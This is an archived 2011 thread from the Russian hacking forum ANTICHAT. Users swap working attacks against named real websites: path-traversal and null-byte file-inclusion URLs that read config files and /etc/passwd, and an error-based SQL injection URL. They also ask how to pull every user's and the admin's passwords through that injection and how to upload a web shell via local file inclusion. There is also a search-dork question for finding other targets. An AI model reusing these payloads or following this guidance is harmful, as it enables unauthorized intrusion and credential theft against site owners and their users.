ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.08.2011, 17:37
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Сообщение от =Zeus=
=Zeus= said:
Думаю что кавычки это наименьшая из проблем там. Ведь у пользователя нету прав.
Странно, я почему-то думал, что Magic Quotes можно обойти.
Можно обойти, но INTO DUMPFILE требует именно кавычек и чистый путь без хекса и CHAR().
|
|
|
02.08.2011, 19:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
31256
Репутация:
1
|
|
Есть вопросец.Имеется вот такой вот инклуд:
Код:
Code:
http://atlanticacorp.com/pages/admin/img_stats.php?file=../../../inf/config.php
.Но вывод идет только одной строки ( а именно 3).Можно ли выжать что то большее? |
|
|
|
02.08.2011, 23:37
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]//if($_SESSION['user_admin']>=$adminRights['stats']) {
[/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]]) && !empty([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]])) {
if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'./cache/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]])) {
[/COLOR][COLOR="#0000BB"]$contents[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'./cache/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$imgTyp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$contents[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$imgTitel[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$contents[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$imgValues[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$contents[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$imgStrings[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$contents[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$inWerte[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]unserialize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$imgValues[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$inStrings[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]unserialize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$imgStrings[/COLOR][COLOR="#007700"]);
}
}[/COLOR][/COLOR]
Здесь не инклуд, а локальное урезанное чтение файлов.
В коде жесткое ограничение, что значения берутся только с 3 строчки. Странно, что проверка на админа закомментирована. |
|
|
|
02.08.2011, 23:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
31256
Репутация:
1
|
|
ДАДАДА.Меня тоже удивила, как будто специально багу мастерили в двиге.Тоесть ничего не сделать?А вот нашел сайтец на похожем движке:
Код:
Code:
http://cwerymt2.ru/index.php?s=../../../../../../../../etc/passwd%00
Двиг аналогичный, но инклуд пашет (просто видно на том сайте нуль байт не пахал).Чисто дальнейшее развитие событий какое может быть?Как происходит залив шелла через локальный инклуд, если неизвестны пути до access.log ? |
|
|
|
03.08.2011, 00:22
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Это не инклуд а читалка. Совсем разные понятия.
Всё, что ты можешь сделать с помощью этой уязвимости - читать 3-ую строчку из файлов.
|
|
|
|
03.08.2011, 12:05
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
Нашел SQL-инъекцию на сайте...ребята из античата раскрутили её до вывода версии, имя пользователя, таблицы... Напишите как можно из этих данных получить пароли всех пользователей в том числе и админа)))
Вот SQL-инъекции
http://www.tnak.am/sub/aforizm.php?act=1&uid=52&let=1/**/and/**/row(1,1)%3E(select/**/count(*),concat(version(),0x3a,floor(rand()*2))/**/x/**/from/**/(select/**/1/**/union/**/select/**/2)a/**/group/**/by/**/x/**/limit/**/1)+--+1
|
|
|
|
03.08.2011, 13:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от aydin-ka
aydin-ka said:
Нашел SQL-инъекцию на сайте...ребята из античата раскрутили её до вывода версии, имя пользователя, таблицы... Напишите как можно из этих данных получить пароли всех пользователей в том числе и админа)))
Вот SQL-инъекции
http://www.tnak.am/sub/aforizm.php?act=1&uid=52&let=1/**/and/**/row(1,1)%3E(select/**/count(*),concat(version(),0x3a,floor(rand()*2))/**/x/**/from/**/(select/**/1/**/union/**/select/**/2)a/**/group/**/by/**/x/**/limit/**/1)+--+1
/thread43966.html
|
|
|
|
03.08.2011, 13:45
|
|
Познающий
Регистрация: 23.12.2009
Сообщений: 70
Провел на форуме:
641075
Репутация:
10
|
|
при входе в админку выдает
Сообщение от None
Fatal error: Class 'COM' not found in /www/htdocs/site/custom.php on line 5
из-за чего может не пускать? из-за другой геолокации или нет?
|
|
|
|
03.08.2011, 14:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от FoXuk
FoXuk said:
при входе в админку выдает
Сообщение от None
Fatal error: Class 'COM' not found in /www/htdocs/site/custom.php on line 5
из-за чего может не пускать? из-за другой геолокации или нет?
" if author else f"
FoXuk said:
при входе в админку выдает
Сообщение от None
Fatal error: Class 'COM' not found in /www/htdocs/site/custom.php on line 5
из-за чего может не пускать? из-за другой геолокации или нет?
Фатальная ошибка: Класс 'COM' не найден в /www/htdocs/site/custom.php на строке 5
|
|
|
|
03.08.2011, 18:52
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
как отфильтровать запрос таким образом, мне например надо inurl:index.php?test= но что бы искало по контенту например powered by coolsite
попробовал такую чушь inurl:index.php?test= intextowered by coolsite
не канает
подскажите
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
